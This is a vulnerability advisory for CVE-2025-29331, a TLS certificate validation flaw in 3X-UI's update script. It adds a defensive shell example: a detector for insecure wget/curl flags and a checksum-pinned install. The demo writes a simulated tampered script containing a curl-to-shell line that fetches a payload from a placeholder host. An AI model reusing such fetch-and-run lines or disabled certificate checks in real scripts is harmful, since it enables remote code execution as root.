2025-05-23
Affected Versions: < v2.5.3
CVE: CVE-2025-29331
CWE: 295 Improper Certificate Validation
3X-UI before v2.5.3 does not verify TLS certificates when downloading updates from the x-ui menu. The cause is that the management script x-ui passes the --no-check-certificate option to wget, which makes wget accept any certificate the server presents, including one presented by an attacker in the network path.
3X-UI is an Xray VPN panel that supports multiple protocols and clients, with features including expiration dates, traffic limits and IP restrictions, and compatibility with VMess, VLESS, Trojan, Shadowsocks and WireGuard.
An attacker who can intercept the connection (for example through DNS poisoning or a man-in-the-middle position on the network path) could serve a malicious version of the script, which would be downloaded and made executable. The x-ui script requires root privileges to run, so any code execution resulting from this vulnerability occurs with full system privileges. This can lead to complete system compromise when an administrator attempts to update a 3X-UI installation.
The vulnerability was fixed in https://github.com/MHSanaei/3x-ui/pull/2661. It was discovered in an audit performed by Digilol.
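The following is an added example written for this advisory; it is not code from 3X-UI or from the fixing pull request. It shows the pattern the advisory describes, a wget download with --no-check-certificate that is then made executable, beside a hardened update step, and includes a small audit function that flags such flags in a script before it is run as root. The snippets, paths and URLs (example.invalid) are constructed for illustration; the hardened step assumes the operator has an expected SHA-256 of the script from a trusted out-of-band source, which the advisory itself does not discuss.

```shell
#!/bin/sh
# Added example for CVE-2025-29331 (not 3X-UI's own code). It shows the
# unsafe pattern described in the advisory beside a hardened update step:
#   has_insecure_download   - flags wget/curl invocations that disable TLS
#                             certificate verification in a script's text
#   install_verified_script - installs a downloaded script only after its
#                             SHA-256 matches a pin supplied out of band
# Paths, URLs and snippets below are constructed for illustration.

# Constructed snippet resembling the vulnerable pattern: the flag tells wget
# to accept any certificate, so an attacker on the path can swap the script.
VULNERABLE_SNIPPET='wget --no-check-certificate -O /usr/bin/x-ui https://example.invalid/x-ui.sh
chmod +x /usr/bin/x-ui'

# Constructed hardened counterpart: wget verifies the server certificate by
# default, and the file is staged in a temp path until its checksum is checked.
HARDENED_SNIPPET='wget -O /tmp/x-ui.download https://example.invalid/x-ui.sh
install_verified_script /tmp/x-ui.download "$EXPECTED_SHA256" /usr/bin/x-ui'

# Return 0 if the script text passed as $1 disables certificate checking:
# wget's --no-check-certificate, or curl's -k (alone or combined, e.g. -sk)
# or --insecure. Return 1 otherwise. Usable as a pre-run audit of any
# downloaded installer before it is executed as root.
has_insecure_download() {
    printf '%s\n' "$1" | grep -Eq -e \
        '--no-check-certificate|curl[^|;&]*[[:space:]](-[a-zA-Z]*k[a-zA-Z]*|--insecure)([[:space:]]|$)'
}

# Print the SHA-256 of a file. sha256sum is the GNU tool; shasum is the
# fallback on BSD/macOS systems.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Hardened install step: $1 downloaded file, $2 expected SHA-256 (hex, from a
# trusted out-of-band source such as a signed release note), $3 destination.
# The file is installed with mode 0755 only if the digest matches; otherwise
# it is deleted and the function returns 1, so nothing untrusted becomes
# executable even if the download itself was tampered with.
install_verified_script() {
    downloaded="$1"; expected="$2"; dest="$3"
    actual=$(sha256_of "$downloaded")
    if [ "$actual" != "$expected" ]; then
        echo "checksum mismatch for $downloaded (got $actual), refusing to install" >&2
        rm -f "$downloaded"
        return 1
    fi
    install -m 0755 "$downloaded" "$dest"
}

# Demonstration on constructed data in a temporary directory.
demo() {
    if has_insecure_download "$VULNERABLE_SNIPPET"; then
        echo "vulnerable snippet: certificate checking disabled"
    fi
    if ! has_insecure_download "$HARDENED_SNIPPET"; then
        echo "hardened snippet: no insecure download flags found"
    fi

    tmpd=$(mktemp -d)
    printf '#!/bin/sh\necho "x-ui menu"\n' > "$tmpd/x-ui.download"
    pin=$(sha256_of "$tmpd/x-ui.download")
    if install_verified_script "$tmpd/x-ui.download" "$pin" "$tmpd/x-ui"; then
        echo "genuine file installed: $tmpd/x-ui"
    fi
    # A script swapped in from a MITM position has a different digest and is rejected.
    printf '#!/bin/sh\ncurl -sk https://example.invalid/payload | sh\n' > "$tmpd/x-ui.download"
    if ! install_verified_script "$tmpd/x-ui.download" "$pin" "$tmpd/x-ui"; then
        echo "tampered file rejected, $tmpd/x-ui unchanged"
    fi
    rm -rf "$tmpd"
}

demo
```

Dropping --no-check-certificate restores wget's default certificate verification, which is the change that closes this class of issue; the checksum pin is defence in depth on top of it, since it also rejects a tampered file in cases TLS does not cover, such as a compromised origin or a mirror serving the wrong release. The audit function is deliberately text-based so it can be run over an installer before that installer is ever executed as root.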
Credit: Irem Kuyucu of Digilol